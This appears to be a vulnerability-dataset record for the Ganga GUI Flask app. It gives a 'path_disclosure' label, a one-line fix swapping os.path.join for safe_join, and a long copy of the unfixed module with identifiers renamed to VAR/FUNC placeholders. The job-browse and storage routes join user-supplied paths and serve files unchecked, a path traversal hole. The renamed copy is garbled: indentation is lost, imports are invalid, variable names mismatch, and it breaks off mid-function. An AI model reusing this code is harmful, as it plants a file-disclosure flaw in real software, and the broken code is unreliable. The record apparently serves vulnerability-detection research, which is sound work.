    any available data on the "pty-output" socket.io channel.
    """
    max_read_bytes = 1024 * 20
    while True:
        # Yield to the socketio event loop between polls.
        socketio.sleep(0.01)
        if not gui.config["FD"]:
            continue
        # Non-blocking readiness check (zero-second timeout).
        readable, _, _ = select.select([gui.config["FD"]], [], [], 0)
        if readable:
            output = os.read(gui.config["FD"], max_read_bytes).decode()
            socketio.emit("pty-output", {"output": output}, namespace="/pty")
def start_web_cli(host: str, port: int, internal_port: int, log_output=True, ganga_args: str = ""):
    """
    Start the production GUI web server (eventlet via socketio) serving the
    terminal on the specified port.

    :param host: str - interface to bind the server on
    :param port: int - port for the GUI server
    :param internal_port: int - port of the Internal API server
    :param log_output: bool - whether socketio logs requests
    :param ganga_args: str - arguments to be passed through to ganga
    """
    from GangaGUI.start import create_default_user

    # Make sure a default GUI user exists and show its credentials on stdout.
    default_user, default_password = create_default_user()
    print(f"Starting the GUI server on http://{host}:{port}")
    print(f"You login information for the GUI is: Username: {default_user.user} Password: {default_password}")
    # Hand configuration to the Flask app before serving requests.
    gui.config["INTERNAL_PORT"] = internal_port
    gui.config["WEB_CLI"] = True
    gui.config["GANGA_ARGS"] = ganga_args
    socketio.run(gui, host=host, port=port, log_output=log_output)  # TODO
# ******************** Shutdown Function ******************** #
# Route used to shutdown the Internal API server and GUI server
@gui.route("/shutdown", methods=["GET"])
def shutdown():
    """
    Shut down the Internal API server and, with it, the GUI server.

    Refuses to act in WEB CLI mode, where the server has to be stopped
    manually by the operator.
    """
    # Self-shutdown is not supported when running as the web CLI.
    if gui.config["WEB_CLI"] is True:
        flash("WEB CLI Mode is on, cannot self shutdown server. Consider doing manually.", "warning")
        return redirect(url_for("dashboard"))
    try:
        query_internal_api("/shutdown", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return "GUI Shutdown Successful."
# ******************** EOF ******************** #
| path_disclosure | {
"code": [
"from werkzeug.utils import secure_filename",
" abs_path = os.path.join(job_base_dir, path)"
],
"line_no": [
15,
659
]
} | {
"code": [
"from werkzeug.utils import secure_filename, safe_join",
" abs_path = safe_join(job_base_dir, path)"
],
"line_no": [
15,
659
]
} | import os
import jwt
import json
import requests
import time
import select
import termios
import struct
import .fcntl
import subprocess
import pty
import sys
import datetime
from functools import wraps
from werkzeug.utils import secure_filename
from werkzeug.security import generate_password_hash, check_password_hash
from flask import Flask, request, jsonify, render_template, flash, redirect, url_for, VAR_84, send_file, make_response
from flask_login import .login_user, login_required, logout_user, current_user, UserMixin
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_socketio import SocketIO
from GangaGUI.gui.config import Config
VAR_0 = Flask(__name__)
VAR_0.config.from_object(Config)
VAR_1 = SQLAlchemy(VAR_0)
VAR_2 = LoginManager(VAR_0)
VAR_2.login_view = "login"
VAR_2.login_message = "Please Login to Access this Page."
VAR_2.login_message_category = "warning"
VAR_3 = SocketIO(VAR_0)
class CLASS_0(UserMixin, VAR_1.Model):
__tablename__ = "users"
VAR_35 = VAR_1.Column(VAR_1.Integer, primary_key=True)
VAR_36 = VAR_1.Column(VAR_1.String(64), unique=True)
VAR_37 = VAR_1.Column(VAR_1.String(32), unique=True)
VAR_38 = VAR_1.Column(VAR_1.String(64))
VAR_39 = VAR_1.Column(VAR_1.String(32))
VAR_40 = VAR_1.Column(VAR_1.Text)
def FUNC_66(self, VAR_41: str):
self.password_hash = generate_password_hash(VAR_41)
def FUNC_67(self, VAR_41: str) -> bool:
return check_password_hash(self.password_hash, VAR_41)
def FUNC_68(self, VAR_42: int = 5) -> str:
return jwt.encode(
{"public_id": self.public_id, "exp": datetime.datetime.utcnow() + datetime.timedelta(days=VAR_42)},
VAR_0.config["SECRET_KEY"], algorithm="HS256")
def __repr__(self):
return "User {}: {} (Public ID: {}, Role: {})".format(self.id, self.user, self.public_id, self.role)
@VAR_2.user_loader
def FUNC_0(VAR_4):
return CLASS_0.query.get(int(VAR_4))
VAR_5 = {
"new": "info",
"completed": "success",
"completed_frozen" : "success",
"failed": "danger",
"failed_frozen" : "danger",
"running": "primary",
"submitted": "secondary",
"killed": "warning"
}
VAR_6 = {"txt", "py"}
actions = {}
VAR_8 = {}
@VAR_0.before_first_request
def FUNC_1():
global VAR_7, VAR_8
if VAR_0.config['WEB_CLI'] is True:
FUNC_61(VAR_0.config['INTERNAL_PORT'], VAR_25=VAR_0.config["GANGA_ARGS"])
VAR_84["WEB_CLI"] = True
elif VAR_0.config['INTERNAL_PORT'] is None:
VAR_0.config['INTERNAL_PORT'] = os.environ['INTERNAL_PORT']
if current_user.is_authenticated:
logout_user()
FUNC_59()
if not FUNC_60():
print("INTERNAL SERVER UNAVAILABLE, TERMINATING...")
sys.exit(1)
try:
VAR_7 = FUNC_58("/internal/jobs/actions", "get")
VAR_8 = FUNC_58("/internal/plugins", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
@VAR_0.route("/login", methods=["GET", "POST"])
def VAR_2():
if current_user.is_authenticated:
return redirect(url_for("dashboard"))
if request.method == "POST":
VAR_85 = request.form.get("username")
VAR_41 = request.form.get("password")
VAR_37 = CLASS_0.query.filter_by(VAR_37=VAR_85).first()
if VAR_37 and VAR_37.verify_password(VAR_41):
login_user(VAR_37, True)
flash("Login successful", "success")
return redirect(url_for("dashboard"))
flash("Error identifying the user", "danger")
VAR_43 = CLASS_0.query.all()
return render_template("login.html", title="Login", VAR_43=users)
@VAR_0.route("/logout", methods=["GET"])
def FUNC_3():
if current_user.is_authenticated:
logout_user()
return redirect(url_for("login"))
@VAR_0.route("/")
@login_required
def FUNC_4():
VAR_44 = {}
VAR_45 = []
VAR_46 = []
try:
VAR_44 = FUNC_58("/internal/jobs/statistics", "get")
VAR_45 = FUNC_58("/internal/jobs/recent", "get")
VAR_72 = current_user
VAR_46 = FUNC_58("/internal/jobs", "get", VAR_73={
"ids": VAR_72.pinned_jobs if VAR_72.pinned_jobs is not None else json.dumps([]),
"auto-validate-ids": True})
except Exception as err:
flash(str(err), "danger")
return render_template("dashboard.html",
title="Dashboard",
VAR_44=quick_statistics,
VAR_45=recent_jobs_info,
VAR_46=pinned_jobs_info,
VAR_5=status_color)
@VAR_0.route("/config", methods=["GET", "POST"])
@login_required
def FUNC_5():
VAR_47 = []
VAR_48 = []
VAR_18 = None
if request.method == "POST":
VAR_18 = request.form.get("section")
VAR_18 = None if VAR_18 in ["", None] else VAR_18
try:
VAR_47 = FUNC_58("/internal/config", "get")
VAR_48 = VAR_47 if VAR_18 is None else [s for s in VAR_47 if s["name"] == VAR_18]
except Exception as err:
flash(str(err), "danger")
return render_template("config.html", title="Config", VAR_47=full_config_info, VAR_48=config_info)
@VAR_0.route("/config_edit",methods=["GET", "POST"])
@login_required
def FUNC_6():
VAR_49 = VAR_0.config["GANGA_RC"]
with open(VAR_49, "rt") as VAR_14:
VAR_86 = VAR_14.read()
if request.method == 'POST':
VAR_87 = request.form['config-data']
with open(VAR_49, 'w') as f1:
f1.write(str(VAR_87))
flash(".gangarc Edited", "success")
with open(VAR_49, "rt") as f2:
VAR_86 = f2.read()
return render_template("config_edit.html", title="Edit gangarc", VAR_86=ganga_config)
@login_required
@VAR_0.route("/create", methods=["GET", "POST"])
def FUNC_7():
if request.method == "POST":
if "loadfile" in request.files:
VAR_119 = request.files["loadfile"]
if VAR_119.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
if VAR_119 and FUNC_57(VAR_119.filename):
VAR_130 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "loadfile.txt")
VAR_119.save(VAR_130)
try:
VAR_98 = FUNC_58("/internal/load", "get", VAR_73={"path": VAR_130})
except Exception as err:
flash(str(err), "danger")
return redirect(request.url)
flash(VAR_98.get("message"), "success")
return redirect(request.url)
if "runfile" in request.files:
VAR_120 = request.files["runfile"]
if VAR_120.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
if VAR_120 and FUNC_57(VAR_120.filename):
VAR_130 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "runfile.py")
VAR_120.save(VAR_130)
try:
VAR_98 = FUNC_58("/internal/runfile", "get", VAR_73={"path": VAR_130})
except Exception as err:
flash(str(err), "danger")
return redirect(request.url)
flash(VAR_98.get("message"), "success")
return redirect(request.url)
flash("No file, retry!", "warning")
return redirect(request.url)
try:
VAR_88 = FUNC_58("/internal/templates", "get",
VAR_73={"recent": True, "length": "6"})
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template("create.html", title="Create", VAR_88=templates_info)
@VAR_0.route("/create/runfile", methods=["GET", "POST"])
@login_required
def FUNC_8():
VAR_50 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "runfile.py")
if request.method == "POST":
VAR_89 = request.form.get("runfile-data")
with open(VAR_50, "w+") as VAR_14:
f.write(VAR_89)
try:
VAR_98 = FUNC_58("/internal/runfile", "get", VAR_73={"path": VAR_50})
flash(VAR_98["message"], "success")
except Exception as err:
flash(str(err), "danger")
return redirect(request.url)
return render_template("runfile.html", title="Runfile")
@VAR_0.route("/templates", methods=["GET", "POST"])
@login_required
def FUNC_9():
if request.method == "POST":
session["templates_per_page"] = int(request.form.get("templates-per-page"))
VAR_84["templates_filter"] = {key: request.form.get(form_name) for key, form_name in
zip(["application", "backend"], ["template-application", "template-backend"])}
VAR_51 = int(request.args.get("page")) if request.args.get("page") is not None else 0
VAR_52 = VAR_84["templates_per_page"]
try:
VAR_90 = FUNC_58("/internal/templates/length", "get", VAR_73=VAR_84["templates_filter"])
VAR_91 = (int(VAR_90) // int(VAR_52)) + 1
if VAR_51 >= VAR_91:
return redirect(url_for("templates_page", page=VAR_91 - 1))
params = VAR_84["templates_filter"].copy()
VAR_73.update({
"recent": True,
"length": VAR_52,
"offset": VAR_51
})
VAR_88 = FUNC_58("/internal/templates", "get", VAR_73=params)
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("create_page"))
return render_template("templates.html",
title="Templates",
VAR_91=number_of_pages,
VAR_51=current_page,
backends=VAR_8["backends"],
applications=VAR_8["applications"],
VAR_88=templates_info)
@VAR_0.route("/jobs", methods=["GET", "POST"])
@login_required
def FUNC_10():
if request.method == "POST":
session["jobs_per_page"] = int(request.form.get("jobs-per-page"))
VAR_84["jobs_filter"] = {key: request.form.get(form_name) for key, form_name in
zip(["status", "application", "backend"],
["job-status", "job-application", "job-backend"])}
VAR_51 = int(request.args.get("page")) if request.args.get("page") is not None else 0
VAR_53 = VAR_84["jobs_per_page"]
try:
VAR_92 = FUNC_58("/internal/jobs/length", "get", VAR_73=VAR_84["jobs_filter"])
VAR_91 = (int(VAR_92) // int(VAR_53)) + 1
if VAR_51 >= VAR_91:
return redirect(url_for("jobs_page", page=VAR_91 - 1))
params = VAR_84["jobs_filter"].copy()
VAR_73.update({
"recent": True,
"length": VAR_53,
"offset": VAR_51
})
VAR_93 = FUNC_58("/internal/jobs", "get", VAR_73=params)
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template("jobs.html",
title="Jobs",
VAR_93=jobs_info,
backends=VAR_8["backends"],
applications=VAR_8["applications"],
VAR_91=number_of_pages,
VAR_51=current_page,
VAR_5=status_color)
@VAR_0.route('/jobs/<int:VAR_9>')
@login_required
def FUNC_11(VAR_9: int):
VAR_54 = None
VAR_55 = None
try:
VAR_94 = FUNC_58(f"/internal/jobs/{VAR_9}", "get")
VAR_95 = FUNC_58(f"/internal/jobs/{VAR_9}/full-print", "get")
VAR_96 = os.path.join(VAR_94["outputdir"], "stdout")
VAR_97 = os.path.join(VAR_94["outputdir"], "stderr")
if os.path.exists(VAR_96):
with open(VAR_96) as VAR_14:
VAR_54 = VAR_14.read()
if os.path.exists(VAR_97):
with open(VAR_97) as VAR_14:
VAR_55 = VAR_14.read()
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("jobs_page"))
return render_template("job.html",
title=f"Job {VAR_9}",
VAR_94=job_info,
VAR_5=status_color,
attribute_actions=VAR_7.get("attributes"),
method_actions=VAR_7.get("methods"),
VAR_54=stdout,
VAR_55=stderr,
VAR_95=full_print_info)
@VAR_0.route("/jobs/<int:VAR_9>/export")
@login_required
def FUNC_12(VAR_9: int):
VAR_56 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], f"export.txt")
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/export", "get", VAR_73={"path": VAR_56})
return send_file(VAR_56, as_attachment=True, cache_timeout=0, attachment_filename=f"Job_{VAR_9}.txt")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("job_page", VAR_9=job_id))
@VAR_0.route("/jobs/<int:VAR_9>/edit", methods=["GET", "POST"])
@login_required
def FUNC_13(VAR_9: int):
VAR_57 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "loadfile.txt")
VAR_56 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "export.txt")
if request.method == "POST":
VAR_99 = request.form.get("edited-job-info")
with open(VAR_57, "w+") as VAR_14:
f.write(VAR_99)
try:
VAR_98 = FUNC_58("/internal/load", "get", VAR_73={"path": VAR_57})
flash(VAR_98["message"], "success")
except Exception as err:
flash(str(err), "danger")
return redirect(request.url)
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/export", "get", VAR_73={"path": VAR_56})
with open(VAR_56) as VAR_14:
VAR_121 = VAR_14.read()
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("job_page", VAR_9=job_id))
return render_template("edit_job.html", title=f"Edit Job {VAR_9}", VAR_9=job_id, VAR_121=exported_data)
@VAR_0.route("/job/<int:VAR_9>/browse", defaults={"path": ""})
@VAR_0.route("/job/<int:VAR_9>/browse/<VAR_10:path>")
@login_required
def FUNC_14(VAR_9: int, VAR_10):
try:
VAR_94 = FUNC_58(f"/internal/jobs/{VAR_9}", "get")
VAR_100 = os.path.dirname(os.path.dirname(VAR_94["outputdir"]))
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("job_page", VAR_9=job_id))
VAR_58 = os.path.join(VAR_100, VAR_10)
VAR_59 = os.path.dirname(VAR_58).replace(VAR_100, "")
if not os.path.exists(VAR_58):
flash("Directory for this job does not exist.", "warning")
return redirect(url_for("job_page", VAR_9=job_id))
if os.path.isfile(VAR_58):
return send_file(VAR_58)
VAR_60 = []
VAR_61 = os.listdir(VAR_58)
for file in VAR_61:
VAR_60.append({
"file": file,
"directory": os.path.isdir(os.path.join(VAR_58, file))
})
return render_template('job_dir.html', title=f"Job {VAR_9} Directory",
VAR_9=job_id,
VAR_58=abs_path,
VAR_60=files_info,
VAR_59=back_path)
@VAR_0.route("/jobs/<int:VAR_9>/subjobs", methods=["GET", "POST"])
@login_required
def FUNC_15(VAR_9: int):
if request.method == "POST":
session["subjobs_per_page"] = int(request.form.get("subjobs-per-page"))
VAR_84["subjobs_filter"] = {key: request.form.get(form_name) for key, form_name in
zip(["status", "application", "backend"],
["subjob-status", "subjob-application", "subjob-backend"])}
VAR_51 = int(request.args.get("page")) if request.args.get("page") is not None else 0
VAR_62 = VAR_84["subjobs_per_page"]
try:
VAR_101 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/length", "get",
VAR_73=VAR_84["subjobs_filter"])
VAR_91 = (int(VAR_101) // int(VAR_62)) + 1
if VAR_51 >= VAR_91:
return redirect(url_for("subjobs_page", page=VAR_91 - 1, VAR_9=job_id))
params = VAR_84["subjobs_filter"].copy()
VAR_73.update({
"recent": True,
"length": VAR_62,
"offset": VAR_51
})
VAR_102 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs", "get", VAR_73=params)
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("job_page", VAR_9=job_id))
return render_template("subjobs.html",
title=f"Subjobs - Job {VAR_9}",
VAR_5=status_color,
VAR_91=number_of_pages,
VAR_51=current_page,
backends=VAR_8["backends"],
applications=VAR_8["applications"],
VAR_102=subjobs_info,
VAR_9=job_id)
@VAR_0.route("/jobs/<int:VAR_9>/subjobs/<int:VAR_11>", methods=["GET"])
@login_required
def FUNC_16(VAR_9: int, VAR_11: int):
VAR_54 = None
VAR_55 = None
try:
VAR_103 = FUNC_58(f"/internal/jobs/{VAR_9}/outputdir", "get")
VAR_104 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}", "get")
VAR_95 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}/full-print", "get")
VAR_105 = os.path.dirname(os.path.dirname(VAR_103["outputdir"]))
VAR_106 = os.path.dirname(os.path.dirname(VAR_104["outputdir"]))
VAR_107 = VAR_106.replace(VAR_105, "")
VAR_96 = os.path.join(VAR_104["outputdir"], "stdout")
VAR_97 = os.path.join(VAR_104["outputdir"], "stderr")
if os.path.exists(VAR_96):
with open(VAR_96) as VAR_14:
VAR_54 = VAR_14.read()
if os.path.exists(VAR_97):
with open(VAR_97) as VAR_14:
VAR_55 = VAR_14.read()
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("subjobs_page", VAR_9=job_id))
return render_template("subjob.html",
title=f"Subjob {VAR_11} - Job {VAR_9}",
VAR_104=subjob_info,
VAR_5=status_color,
attribute_actions=VAR_7["attributes"],
method_actions=VAR_7["methods"],
VAR_54=stdout,
VAR_55=stderr,
VAR_95=full_print_info,
VAR_9=job_id,
VAR_107=browse_path)
@VAR_0.route("/credentials")
@login_required
def FUNC_17():
try:
VAR_108 = FUNC_58("/internal/credentials", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template('credentials.html', credential_info_list=VAR_108)
@VAR_0.route("/queue", methods=["GET"])
@login_required
def FUNC_18():
try:
VAR_109 = FUNC_58("/internal/queue", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template('queue.html', queue_info_list=VAR_109)
@VAR_0.route('/plugins')
@login_required
def FUNC_19():
try:
VAR_110 = VAR_8
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template('plugins.html', VAR_110=plugins_info)
@VAR_0.route("/plugin/<VAR_12>")
@login_required
def FUNC_20(VAR_12: str):
try:
VAR_111 = FUNC_58(f"/internal/VAR_8/{VAR_12}", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("plugins_page"))
return render_template("plugin.html", title=f"{VAR_12}", VAR_111=plugin_info)
@VAR_0.route("/logs")
@login_required
def FUNC_21():
VAR_63 = VAR_0.config["GANGA_LOG"]
VAR_64 = VAR_0.config["ACCESS_LOG"]
VAR_65 = VAR_0.config["ERROR_LOG"]
try:
with open(VAR_63, "rt") as VAR_14:
VAR_122 = VAR_14.read()
with open(VAR_64, "rt") as VAR_14:
VAR_123 = VAR_14.read()
with open(VAR_65, "rt") as VAR_14:
VAR_124 = VAR_14.read()
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template("logs.html", title="Logs", VAR_122=ganga_log_data,
VAR_123=gui_accesslog_data, VAR_124=gui_errorlog_data)
@VAR_0.route("/storage", defaults={"path": ""}, methods=["GET", "POST"])
@VAR_0.route("/storage/<VAR_10:path>", methods=["GET", "POST"])
@login_required
def FUNC_22(VAR_10):
VAR_66 = VAR_0.config["STORAGE_FOLDER"]
VAR_58 = os.path.join(VAR_66, VAR_10)
if request.method == "POST":
if "storagefile" in request.files:
VAR_125 = request.files["storagefile"]
if VAR_125.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
if VAR_125:
if not os.path.isdir(VAR_58):
flash("Error while uploading the file", "danger")
return redirect(request.url)
VAR_20 = secure_filename(VAR_125.filename)
VAR_130 = os.path.join(VAR_58, VAR_20)
VAR_125.save(VAR_130)
flash("Successfully uploaded the file.", "success")
return redirect(request.url)
flash("No file, retry!", "warning")
return redirect(request.url)
VAR_59 = os.path.dirname(VAR_58).replace(VAR_66, "")
if not os.path.exists(VAR_58):
flash("Directory does not exist.", "warning")
return redirect(url_for("dashboard"))
if os.path.isfile(VAR_58):
return send_file(VAR_58)
VAR_60 = []
VAR_61 = os.listdir(VAR_58)
for file in VAR_61:
VAR_60.append({
"file": file,
"directory": os.path.isdir(os.path.join(VAR_58, file))
})
return render_template("storage.html", title="Storage",
VAR_58=abs_path,
VAR_60=files_info,
VAR_59=back_path)
@VAR_0.route("/cli")
@login_required
def FUNC_23():
return render_template("cli.html")
@VAR_3.on("connect", namespace="/pty")
def FUNC_24():
if VAR_0.config["CHILD_PID"] and current_user.is_authenticated:
VAR_3.start_background_task(target=FUNC_63)
return
@VAR_3.on("pty-input", namespace="/pty")
def FUNC_25(VAR_13):
if VAR_0.config["FD"] and current_user.is_authenticated:
os.write(VAR_0.config["FD"], VAR_13["input"].encode())
@VAR_3.on("resize", namespace="/pty")
def FUNC_26(VAR_13):
if VAR_0.config["FD"] and current_user.is_authenticated:
FUNC_62(VAR_0.config["FD"], VAR_13["rows"], VAR_13["cols"])
@VAR_0.route("/token", methods=["POST"])
def FUNC_27():
VAR_67 = request.json if request.json else {}
VAR_68 = VAR_67.get("username")
VAR_69 = VAR_67.get("password")
if not VAR_68 or not VAR_69:
VAR_70 = {"success": False, "message": "Could not verify VAR_37."}
return jsonify(VAR_70), 401
VAR_37 = CLASS_0.query.filter_by(VAR_37=VAR_68).first()
if VAR_37 and VAR_37.verify_password(VAR_69):
VAR_112 = VAR_37.generate_auth_token().decode("UTF-8")
VAR_70 = {"token": VAR_112}
return jsonify(VAR_70)
VAR_70 = {"success": False, "message": "Could not verify VAR_37."}
return jsonify(VAR_70), 401
def FUNC_28(VAR_14):
@wraps(VAR_14)
def FUNC_69(*VAR_25, **VAR_23):
VAR_112 = None
if "X-Access-Token" in request.headers:
VAR_112 = request.headers["X-Access-Token"]
if not VAR_112:
return jsonify({"success": False, "message": "Token is missing"}), 401
try:
VAR_13 = jwt.decode(VAR_112, VAR_0.config["SECRET_KEY"], algorithms=["HS256"])
VAR_15 = CLASS_0.query.filter_by(VAR_36=VAR_13["public_id"]).first()
if VAR_15 is None:
return jsonify({"success": False, "message": "Token is old. Please renew"}), 401
except jwt.ExpiredSignatureError:
return jsonify({"success": False, "message": "Token is expired"}), 401
except jwt.InvalidTokenError:
return jsonify({"success": False, "message": "Token is invalid"}), 401
except:
return jsonify({"success": False, "message": "Could not verify token"}), 401
return VAR_14(VAR_15, *VAR_25, **VAR_23)
return FUNC_69
@VAR_0.route("/api/jobs/<int:VAR_9>", methods=["GET"])
@FUNC_28
def FUNC_29(VAR_15, VAR_9: int):
try:
VAR_94 = FUNC_58(f"/internal/jobs/{VAR_9}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_94)
@VAR_0.route("/api/jobs/<int:VAR_9>/<VAR_16>", methods=["GET"])
@FUNC_28
def FUNC_30(VAR_15, VAR_9: int, VAR_16: str):
try:
VAR_113 = FUNC_58(f"/internal/jobs/{VAR_9}/{VAR_16}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_113)
@VAR_0.route("/api/jobs/<int:VAR_9>/full-print", methods=["GET"])
@FUNC_28
def FUNC_31(VAR_15, VAR_9: int):
try:
VAR_95 = FUNC_58(f"/internal/jobs/{VAR_9}/full-print", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_95)
@VAR_0.route("/api/jobs/create", methods=["POST"])
@FUNC_28
def FUNC_32(VAR_15):
VAR_13 = {
"template_id": request.json.get("template_id"),
"job_name": request.json.get("job_name")
}
try:
VAR_98 = FUNC_58("/internal/jobs/create", "post", json=VAR_13)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobs/<int:VAR_9>/copy", methods=["PUT"])
@FUNC_28
def FUNC_33(VAR_15, VAR_9: int):
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/copy", "put")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobs/<int:VAR_9>/<VAR_17>", methods=["PUT"])
@FUNC_28
def FUNC_34(VAR_15, VAR_9: int, VAR_17: str):
VAR_71 = request.json
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/{VAR_17}", "put", json=VAR_71)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobs/<int:VAR_9>", methods=["DELETE"])
@FUNC_28
def FUNC_35(VAR_15, VAR_9: int):
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}", "delete")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobs/<int:VAR_9>/pin", methods=["PUT"])
@FUNC_28
def FUNC_36(VAR_15, VAR_9: int):
VAR_72 = current_user
VAR_40 = json.loads(VAR_72.pinned_jobs) if VAR_72.pinned_jobs is not None else []
if VAR_9 not in VAR_40:
pinned_jobs.append(VAR_9)
VAR_72.pinned_jobs = json.dumps(VAR_40)
VAR_1.session.add(VAR_72)
VAR_1.session.commit()
return jsonify({"success": True, "message": f"Successfully pinned Job (ID={VAR_9})."})
@VAR_0.route("/api/jobs/<int:VAR_9>/unpin", methods=["PUT"])
@FUNC_28
def FUNC_37(VAR_15, VAR_9: int):
VAR_72 = current_user
VAR_40 = json.loads(VAR_72.pinned_jobs) if VAR_72.pinned_jobs is not None else []
if VAR_9 in VAR_40:
pinned_jobs.remove(VAR_9)
VAR_72.pinned_jobs = json.dumps(VAR_40)
VAR_1.session.add(VAR_72)
VAR_1.session.commit()
return jsonify({"success": True, "message": f"Successfully unpinned Job (ID={VAR_9})."})
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs", methods=["GET"])
@FUNC_28
def FUNC_38(VAR_15, VAR_9: int):
VAR_73 = {
"ids": request.args.get("ids"),
"status": request.args.get("status"),
"application": request.args.get("application"),
"backend": request.args.get("backend"),
"recent": request.args.get("recent"),
"length": request.args.get("length"),
"offset": request.args.get("offset")
}
try:
VAR_102 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs", "get", VAR_73=params)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_102)
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs/<int:VAR_11>", methods=["GET"])
@FUNC_28
def FUNC_39(VAR_15, VAR_9: int, VAR_11: int):
try:
VAR_104 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_104)
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs/<int:VAR_11>/<VAR_16>", methods=["GET"])
@FUNC_28
def FUNC_40(VAR_15, VAR_9: int, VAR_11: int, VAR_16: str):
try:
VAR_114 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}/{VAR_16}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_114)
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs/<int:VAR_11>/full-print", methods=["GET"])
@FUNC_28
def FUNC_41(VAR_15, VAR_9: int, VAR_11: int):
try:
VAR_95 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}/full-print", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_95)
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs/<int:VAR_11>/copy", methods=["PUT"])
@FUNC_28
def FUNC_42(VAR_15, VAR_9: int, VAR_11: int):
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}/copy", "put")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobs", methods=["GET"])
@FUNC_28
def FUNC_43(VAR_15):
VAR_73 = {
"ids": request.args.get("ids"),
"status": request.args.get("status"),
"application": request.args.get("application"),
"backend": request.args.get("backend"),
"recent": request.args.get("recent"),
"length": request.args.get("length"),
"offset": request.args.get("offset"),
"auto-validate-ids": request.args.get("auto-validate-ids")
}
try:
VAR_93 = FUNC_58(f"/internal/jobs", "get", VAR_73=params)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_93)
@VAR_0.route("/api/jobs/statistics", methods=["GET"])
@FUNC_28
def FUNC_44(VAR_15):
try:
VAR_115 = FUNC_58("/internal/jobs/statistics", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_115)
@VAR_0.route("/api/queue", methods=["GET"])
@FUNC_28
def FUNC_45(VAR_15):
try:
VAR_109 = FUNC_58("/internal/queue", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_109)
@VAR_0.route("/api/queue/chart", methods=["GET","POST"])
def FUNC_46():
VAR_74 = FUNC_58("/internal/queue/data", "get")
VAR_75 = make_response(json.dumps(VAR_74))
VAR_75.content_type = 'application/json'
return VAR_75
@VAR_0.route("/api/jobs/incomplete_ids", methods=["GET"])
@FUNC_28
def FUNC_47(VAR_15):
try:
VAR_116 = FUNC_58("/internal/jobs/incomplete-ids", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_116)
@VAR_0.route("/api/config", methods=["GET"], defaults={"section": ""})
@VAR_0.route("/api/config/<VAR_18>", methods=["GET"])
@FUNC_28
def FUNC_48(VAR_15, VAR_18: str):
try:
if VAR_18 != "":
VAR_48 = FUNC_58(f"/internal/config/{VAR_18}", "get")
else:
VAR_48 = FUNC_58("/internal/config", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_48)
@VAR_0.route("/api/templates", methods=["GET"])
@FUNC_28
def FUNC_49(VAR_15):
